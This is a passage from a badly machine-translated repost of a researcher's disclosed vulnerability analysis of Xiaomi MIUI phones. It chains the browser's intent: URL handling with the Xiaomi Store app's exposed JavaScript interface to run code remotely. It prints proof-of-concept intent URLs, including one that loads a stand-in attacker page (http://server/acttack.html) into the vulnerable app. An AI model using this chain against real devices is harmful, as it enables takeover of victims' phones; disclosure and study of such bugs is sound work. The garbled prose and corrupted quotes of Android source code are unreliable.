Millet mobile phone MIUI remote code execution vulnerability analysis-vulnerability warning-the black bar safety net

Author: song Shen lei

**** Reproduced please indicate the source http://blogs.360.cn/360mobile/2014/08/25/miui-rce-vul/

7 on I in the study of the webview vulnerability when the specially picked millet phone MIUI tested,found a very obvious security vulnerability. Through the vulnerability can remotely access the local APP permissions,breaking local vulnerabilities and remote exploits in the boundaries,so that the local app vulnerabilities the remote can also be use,to reach the hills hit cattle of the effect. In the vulnerability discovery for the first time,I have the vulnerability details reported to the millet Security Response Center,the current vulnerability has been fixed.

Test environment:phone model: MI 3
Android version: 4.2.1 JOP40D
MIUI version: MIUI-JXCCNBE21
Kernel version: 3.4.35-ga656ab9

A.Xiaomi MIUIthe native browser there is intent to Protocol security issues

In the use of millet native browser when I found MIUI customized the abnormal network page, such as the current url cannot access or network exception will jump to the custom page,by clicking on the web link you can directly enter the WIFI settings interface.

! x1

Based on my past experience, the APP you want in the static pages to achieve inter-process communication mainstream there are two ways, one is through the addJavascriptInterface to the webview added a javascript Bridge interface by calling this interface can directly operate the local JAVA interface. Another method is to use Intent. parseUri parse the URL and let the APP support intent scheme URLs（intent of the Protocol of the URL by parsing the particular format of the URL is directly sent to the system intent.

Test later, sure enough found the Xiaomi browser fully supports the intent of the Protocol of the URL, the test process is as follows, let millet the browser to directly go to the following address, the browser will send the system to initiate the intent, start the local calendar APP

intent:#Intent;component=com. android. calendar/com. android. calendar. LaunchActivity;end

! x2

I then read a bit google official framework, the intent of the source code:

/platform/frameworks/base/+/core/java/android/content/Intent.java

3 9 6 6 the line of Intent. parseUri defined

if (the uri. startsWith(“S.”, i)) b. putString(key, value);

else if (the uri. startsWith(“B.”, i)) b. putBoolean(key, Boolean. parseBoolean(value));

else if (the uri. startsWith (a"b.", i)) b. putByte(key, Byte. parseByte(value));

else if (the uri. startsWith(“c.”, i)) b. putChar(key, value. charAt(0));

else if (the uri. startsWith(“d”, i)) b. putDouble(key, Double. parseDouble(value));

else if (the uri. startsWith(“f.”, i)) b. putFloat(key, Float. parseFloat(value));

else if (the uri. startsWith(“i.”, i)) b. putInt(key, Integer. parseInt(value));

else if (the uri. startsWith(“l.”, i)) b. putLong(key, Long. parseLong(value));

else if (the uri. startsWith (the"s.", i)) b. putShort(key, Short. parseShort(value));

else throw new URISyntaxException(uri, “unknown EXTRA type”, i);

You can clearly see the Intent. parseUri parse URL when you can completely customize the EXTRA DATA and DATA, and acion, etc., through the conform to the format of Protocol address to the local any APP to send any intent, so if the local one of the APP’s export component vulnerability exists, we can also from this entry for a remote attack.

II.** Millet store presence webview****a remote code execution vulnerability**

Along the first part of the idea, I began to audit MIUI system pre-installed and built-in APP, hoping to find that is remotely exploitable. In the automatic Vulnerability Scan, I found millet official APP“Xiaomi store”of the webview using the addjavascriptinterface, and compile the API level is less than 1 7, There may be a webview remote code execution vulnerability.

! [image003](/Article/UploadPic/2014-8/2 0 1 4 8 2 5 1 9 4 9 4 3 5 0 4. png)

So I for this APP for the reverse analysis, we found the APP a plurality of derived components, such as com. xiaomi. shop. activity. The MainActivity component to accept parameters can be external calls to load any web pages.

! [image004](/Article/UploadPic/2014-8/2 0 1 4 8 2 5 1 9 4 9 4 3 1 0 9. png)

While I found the components associated with the com. xiaomi. shop. ui class initialization a call WE addJavascriptInterface vulnerability interface, and does not do any security processing.

! [image005](/Article/UploadPic/2014-8/2 0 1 4 8 2 5 1 9 4 9 4 3 7 0 8. png)

According to the reverse code, com. xiaomi. shop. activity. MainActivity the activity component to accept the EXTRA DATA is of type string, with the first part of the Xiaomi browser the intention of the Protocol vulnerabilities that can be easily written out of the vulnerability verification code, by importing the web page calls the presence of vulnerabilities JavascriptInterface interface WE can in the current APP’s permission to perform any commands and JAVA code

intent:#Intent;component=com. xiaomi. shop/com. xiaomi. shop. activity. MainActivity;S. com. xiaomi. shop. extra_closed_url=http://server/acttack.html;end`

**III.**Security recommendations.

** **Android developers pay attention to user experience development at the same time also should pay attention to safety, because one of the APP’s easy functionality and cause the entire system security is compromised more harm than good.

The present analysis of the vulnerability,if a malicious attacker, by loading the remote malicious Web page using ROOT exploits, completely can directly take control of the victim’s phone, the consequences can not imagine. It is understood that millet official has been fixed the Xiaomi Store APP vulnerabilities, recommend millet mobile phone and MIUI users as soon as possible to upgrade.

Reference:

[1]ht_tps://github. com/android/platform_frameworks_base/blob/master/core/java/android/content/Intent. java_

_ _[2] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4710&gt;